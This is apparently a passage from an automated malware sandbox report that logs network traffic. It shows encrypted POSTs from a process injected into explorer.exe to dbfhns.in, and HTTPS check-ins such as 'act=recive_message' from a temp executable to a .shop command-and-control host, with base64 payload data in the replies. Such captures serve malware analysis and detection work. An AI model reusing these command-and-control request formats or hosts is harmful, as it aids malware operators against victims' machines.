                                                                              May 26, 2024 10:25:03.657107115 CEST159OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 1e cd 83
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuWeLh]@d1?%b>dM[2Ze%7Q@a)
                                                                              May 26, 2024 10:25:04.611924887 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:04 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.452738185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:11.186455011 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://haljhouhmvighpi.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 159
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:11.186582088 CEST159OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 3b fa 90
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuE;f[Ckc&k >b4 k4K}x>PV W6Y&
                                                                              May 26, 2024 10:25:12.106934071 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:11 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              26192.168.2.452739185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:16.590425968 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://bkjyrxsoflynogyv.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 249
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:16.590435982 CEST249OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 4e b4 8b
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu"NxTeyg\4|oQm6U+ce*N(K9Gd<At,ZL=iA:K!}$x*IOcM3BX?<
                                                                              May 26, 2024 10:25:17.742655993 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.452740185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:22.040106058 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://iymhuqeqmdev.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 127
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:22.040106058 CEST127OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 14 e7 9b
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vutiMAk|j][q<f%]6(fX
                                                                              May 26, 2024 10:25:22.960156918 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:22 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.452741185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:29.338723898 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://rscrbtwfrpl.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 350
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:29.338725090 CEST350OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 17 c1 f5
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuLz\`zx_62 0qK!S/4/]O+BS|'`>B|C;2j;HJHF$aoWV>$PHC
                                                                              May 26, 2024 10:25:30.271692991 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:30 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.452742185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:34.563116074 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://feebaxojoajqvghx.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 325
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:34.563116074 CEST325OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4c 42 e9 8e
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuLBMH|i:|Iqr~5g=Vy*JLoW]8x|wYs1=rXN\C0'$w2A*@&DW1
                                                                              May 26, 2024 10:25:35.492666006 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.452743185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:39.806022882 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://flowliaawjqccjvx.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 336
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:39.806057930 CEST336OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 43 d2 b7
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuKCcCGna[KA0PuV9X#e(?\$n)#U\,-u|.N'R2WgT!^V"%,MLGU`oKkUP,
                                                                              May 26, 2024 10:25:40.744919062 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:40 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.452744185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:47.428708076 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://dnklpspcfvmivsa.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 239
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:47.428708076 CEST239OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 51 f9 e7
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuXQx{_xJ<`SC/gU)+UYQPrHDws&AF&M%X\3Aa[@)u5`$gyRki^Z6A
                                                                              May 26, 2024 10:25:48.374391079 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:48 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.452745185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:52.705023050 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://juuhlbwtemhw.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 280
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:52.705023050 CEST280OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 0c ec fd
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu%[E\w@di[dNd~h(mNGP]FY?<PM([cQH8XbN7lzD'">;cqTGwcdDI7
                                                                              May 26, 2024 10:25:53.651457071 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:53 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.452746185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:58.714999914 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uipcoqrcfmpaso.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 339
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:25:58.715032101 CEST339OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 28 b6 ab
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu)(F|m\^XLPal )KDdYd).2eYW)jtr*e0NJG2bs,@yvmW4kb)8`
                                                                              May 26, 2024 10:25:59.643886089 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:25:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449745188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:34 UTC271OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-05-26 08:22:35 UTC814INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=630b5kao97b72k97ukjpp2t1hb; expires=Thu, 19-Sep-2024 02:09:14 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HxyLDbe3FPltHbOQ27vVpzqdNZzXKwQzJnUb6ADwkHM54DE3gBr2bDQLVv6DcTu4UlOirfqNW%2FpBCIIzwlJ5yQ7CEhZfS9kTPrkm2k9CnJ%2F%2B%2FTsbKV2mPXHMr6WqAksFiADVMNE%2FobitKY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bb48ce642cb-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-05-26 08:22:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449747188.114.96.34433192C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:22:35 UTC272OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 74
                                                                              Host: whispedwoodmoodsksl.shop
                                                                              2024-05-26 08:22:35 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                                              2024-05-26 08:22:36 UTC810INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:22:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d5lnnh4s6jti6himstvt7pl9ga; expires=Thu, 19-Sep-2024 02:09:15 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PM81houEGMB%2B0SZRrz7GyIBCktYZLLiA9AuCktLqTZd6AWzUgh6fxFZukT55cytrJym7Wji9SPHuJ%2F9SUmXLrySUGE2%2BrD2g42tRuRPGR9yFzFNAp5XTBeaqDIRvkohh1D9FuqEfeDHcd5M%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 889c5bbb5baf4394-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-05-26 08:22:36 UTC559INData Raw: 33 31 39 38 0d 0a 68 71 57 30 72 73 53 76 4d 78 49 37 50 50 52 7a 73 31 74 37 66 6c 42 68 35 6d 65 33 48 32 6b 78 53 47 34 6a 72 61 73 34 4a 55 6e 39 68 38 4b 4d 2f 70 73 66 4d 45 68 5a 31 6b 6e 48 4b 51 34 62 66 45 4f 48 41 35 55 6c 44 31 41 6b 48 55 61 42 69 56 31 64 61 37 7a 2b 7a 34 79 68 77 52 45 6f 47 56 6d 65 45 64 49 33 47 52 38 37 44 70 59 4c 31 48 63 46 56 69 41 4c 51 4d 6e 4b 56 45 67 73 34 38 44 56 78 4b 72 47 58 6e 70 57 48 74 68 52 31 69 46 5a 52 48 49 73 67 78 50 57 55 67 68 43 49 30 78 65 67 64 41 61 51 43 65 6b 6e 35 62 50 6f 63 31 66 64 46 39 58 6e 42 76 62 50 78 67 61 4f 68 47 50 41 64 39 33 43 31 55 68 41 55 6e 64 78 31 35 50 4a 2b 58 4b 31 59 7a 6f 6a 56 5a 6f 47 51 62 57 51 75 4d 36 43 41 30 6e 44 70 51 44 6c 57 4a 46 53 6d 6f 4c 54
                                                                              Data Ascii: 3198hqW0rsSvMxI7PPRzs1t7flBh5me3H2kxSG4jras4JUn9h8KM/psfMEhZ1knHKQ4bfEOHA5UlD1AkHUaBiV1da7z+z4yhwREoGVmeEdI3GR87DpYL1HcFViALQMnKVEgs48DVxKrGXnpWHthR1iFZRHIsgxPWUghCI0xegdAaQCekn5bPoc1fdF9XnBvbPxgaOhGPAd93C1UhAUndx15PJ+XK1YzojVZoGQbWQuM6CA0nDpQDlWJFSmoLT
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 47 58 39 68 39 48 41 35 70 55 52 66 6c 78 52 68 42 44 44 50 42 63 4f 50 67 61 43 43 4e 5a 7a 43 31 59 74 41 55 2f 4a 7a 6c 6c 50 4c 2b 58 4a 32 73 61 6c 79 56 49 77 46 78 36 52 43 5a 46 68 57 53 30 78 42 34 4d 58 31 6e 4e 4c 54 47 51 56 41 63 6a 46 47 68 39 72 37 73 48 62 78 61 33 4b 57 58 78 4c 56 5a 6b 53 32 44 34 66 46 6a 45 4c 6a 67 50 62 66 41 78 57 4c 52 35 50 78 4d 52 5a 54 53 32 6b 69 5a 62 4c 76 6f 30 4a 4d 48 64 64 68 77 66 6a 4f 67 67 4e 63 68 7a 4b 48 4a 56 36 42 78 4e 79 54 45 6a 48 78 6c 64 4b 49 65 72 43 32 38 57 6e 7a 46 78 32 55 6c 2b 65 47 64 55 2b 47 52 67 2f 44 49 6f 46 32 33 55 4f 56 79 41 46 41 59 47 4a 58 56 39 72 76 49 66 6d 77 61 72 42 57 6e 77 5a 51 64 67 49 6b 54 34 56 58 47 70 44 6a 51 33 61 63 41 5a 5a 4a 41 6c 4d 78 73 68 62
                                                                              Data Ascii: GX9h9HA5pURflxRhBDDPBcOPgaCCNZzC1YtAU/JzllPL+XJ2salyVIwFx6RCZFhWS0xB4MX1nNLTGQVAcjFGh9r7sHbxa3KWXxLVZkS2D4fFjELjgPbfAxWLR5PxMRZTS2kiZbLvo0JMHddhwfjOggNchzKHJV6BxNyTEjHxldKIerC28WnzFx2Ul+eGdU+GRg/DIoF23UOVyAFAYGJXV9rvIfmwarBWnwZQdgIkT4VXGpDjQ3acAZZJAlMxshb
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 4c 56 77 71 6a 4b 52 7a 42 47 45 49 39 52 31 6a 56 5a 52 48 49 49 68 41 6e 53 64 51 31 58 49 67 4e 4f 78 74 74 62 53 79 58 32 77 4e 62 46 71 4d 4a 64 65 56 52 5a 6d 78 72 62 4e 42 30 62 4d 30 50 4b 52 64 4a 6c 53 77 74 71 4f 6c 48 43 78 58 52 4d 4a 2b 32 48 79 59 4b 2f 6a 56 5a 38 47 51 62 57 46 64 30 78 45 78 4d 37 43 59 34 4b 33 48 30 44 57 69 4d 50 51 63 50 50 57 30 73 6e 36 63 4c 56 79 61 76 49 55 58 78 65 57 5a 64 52 6e 33 6b 65 42 48 4a 62 78 44 58 59 63 51 42 66 61 44 6c 43 77 63 64 64 55 57 76 37 69 63 2b 4d 6f 63 45 52 4b 42 6c 52 6c 78 7a 62 4d 68 63 51 4d 77 4f 41 42 74 39 39 42 46 59 73 42 45 6a 50 32 31 31 49 4b 75 58 4d 33 63 47 6f 79 46 42 31 58 68 37 59 55 64 59 68 57 55 52 79 4c 71 30 2f 6c 57 4a 46 53 6d 6f 4c 54 59 2b 52 47 6b 4d 68 35
                                                                              Data Ascii: LVwqjKRzBGEI9R1jVZRHIIhAnSdQ1XIgNOxttbSyX2wNbFqMJdeVRZmxrbNB0bM0PKRdJlSwtqOlHCxXRMJ+2HyYK/jVZ8GQbWFd0xExM7CY4K3H0DWiMPQcPPW0sn6cLVyavIUXxeWZdRn3keBHJbxDXYcQBfaDlCwcddUWv7ic+MocERKBlRlxzbMhcQMwOABt99BFYsBEjP211IKuXM3cGoyFB1Xh7YUdYhWURyLq0/lWJFSmoLTY+RGkMh5
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 70 78 6c 51 77 46 78 36 52 43 5a 46 68 57 53 30 78 46 5a 4d 56 32 54 30 55 48 54 4e 4d 52 73 4f 4a 41 67 63 71 39 73 33 63 77 71 50 43 56 48 4e 57 57 5a 73 58 33 54 4d 51 46 44 51 4d 6a 52 66 57 63 51 56 55 4a 41 42 50 77 73 4e 5a 53 6d 75 71 68 39 48 55 35 70 55 52 58 46 35 54 75 42 72 64 50 6c 6b 44 66 42 72 45 41 74 6b 39 55 78 4d 6d 42 6b 33 47 79 56 4e 43 49 2b 2f 4f 30 38 32 74 79 46 4a 32 56 46 47 66 41 39 73 36 46 78 38 2b 44 34 49 45 31 6d 38 44 57 6d 70 43 41 63 6a 52 47 68 39 72 78 63 6e 62 32 4b 48 64 45 57 38 58 52 39 59 57 33 58 6c 42 58 44 45 43 69 77 62 55 63 41 31 61 49 67 78 48 79 73 5a 58 53 53 7a 6a 78 39 76 43 71 63 74 5a 66 56 56 56 6d 42 6a 58 4f 52 67 57 63 6b 33 45 41 73 30 39 55 78 4d 61 44 30 48 50 30 68 70 59 5a 66 32 48 30 63
                                                                              Data Ascii: pxlQwFx6RCZFhWS0xFZMV2T0UHTNMRsOJAgcq9s3cwqPCVHNWWZsX3TMQFDQMjRfWcQVUJABPwsNZSmuqh9HU5pURXF5TuBrdPlkDfBrEAtk9UxMmBk3GyVNCI+/O082tyFJ2VFGfA9s6Fx8+D4IE1m8DWmpCAcjRGh9rxcnb2KHdEW8XR9YW3XlBXDECiwbUcA1aIgxHysZXSSzjx9vCqctZfVVVmBjXORgWck3EAs09UxMaD0HP0hpYZf2H0c
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 59 68 6b 51 31 68 62 4a 65 55 46 63 42 41 53 55 46 64 59 2f 4f 6b 55 70 47 6b 72 43 78 52 70 59 5a 66 32 48 30 63 44 6d 6c 52 46 32 56 6c 65 56 48 74 41 77 46 52 45 33 43 6f 45 45 30 33 6b 42 57 53 6f 4b 52 38 37 4d 55 45 51 71 37 73 37 52 78 4b 48 4f 51 7a 41 58 48 70 45 4a 6b 57 46 5a 4e 54 55 52 69 68 57 56 59 6b 56 4b 61 67 74 4e 6a 35 45 61 51 79 48 72 77 39 48 41 6f 4d 68 58 66 56 68 52 6c 78 48 65 50 52 49 56 4e 41 4b 4a 41 4e 68 35 47 56 6b 68 41 30 33 47 78 56 63 48 5a 61 54 41 7a 6f 7a 2b 6a 57 42 39 56 31 43 52 42 35 45 6d 56 77 56 79 42 49 68 46 6a 54 30 4b 58 79 55 50 54 73 7a 4b 57 30 30 35 39 73 76 66 78 4b 50 42 57 6e 35 66 54 4a 41 65 32 44 6f 61 46 54 55 4c 69 41 2f 57 65 6b 73 64 61 67 74 5a 6a 35 45 61 5a 44 7a 30 79 70 62 54 36 4e 51
                                                                              Data Ascii: YhkQ1hbJeUFcBASUFdY/OkUpGkrCxRpYZf2H0cDmlRF2VleVHtAwFRE3CoEE03kBWSoKR87MUEQq7s7RxKHOQzAXHpEJkWFZNTURihWVYkVKagtNj5EaQyHrw9HAoMhXfVhRlxHePRIVNAKJANh5GVkhA03GxVcHZaTAzoz+jWB9V1CRB5EmVwVyBIhFjT0KXyUPTszKW0059svfxKPBWn5fTJAe2DoaFTULiA/WeksdagtZj5EaZDz0ypbT6NQ
                                                                              2024-05-26 08:22:36 UTC1369INData Raw: 70 34 53 30 54 30 64 47 7a 63 41 69 41 37 53 66 67 52 58 49 77 4a 49 77 49 6b 55 42 79 7a 38 68 34 36 4d 68 39 5a 53 66 46 51 65 69 56 2f 49 65 52 34 51 63 6c 76 45 43 64 74 34 43 31 6b 73 43 45 54 4a 77 31 39 48 49 4f 66 49 30 73 71 69 77 6c 46 37 55 46 2b 51 46 4e 73 79 48 78 45 78 42 59 4a 46 6d 7a 30 4d 53 32 70 55 41 65 2f 53 56 30 73 73 70 4e 69 59 31 65 62 4b 58 54 41 42 48 70 30 64 31 54 34 5a 45 54 45 4c 67 51 48 66 65 41 74 62 4f 41 52 42 79 4e 74 49 52 79 4c 68 79 39 58 4d 6f 73 74 59 64 6c 70 61 31 6c 2b 52 50 67 46 63 61 6b 4f 70 43 64 4a 55 44 45 68 71 45 77 2f 57 69 56 31 4c 61 37 79 48 31 38 65 73 77 6c 78 7a 58 31 32 64 46 4e 73 34 48 68 51 2f 45 59 63 4b 32 6e 6b 4c 58 43 77 4b 51 4d 44 50 58 55 34 71 37 4d 43 57 67 75 62 4b 53 54 41 42
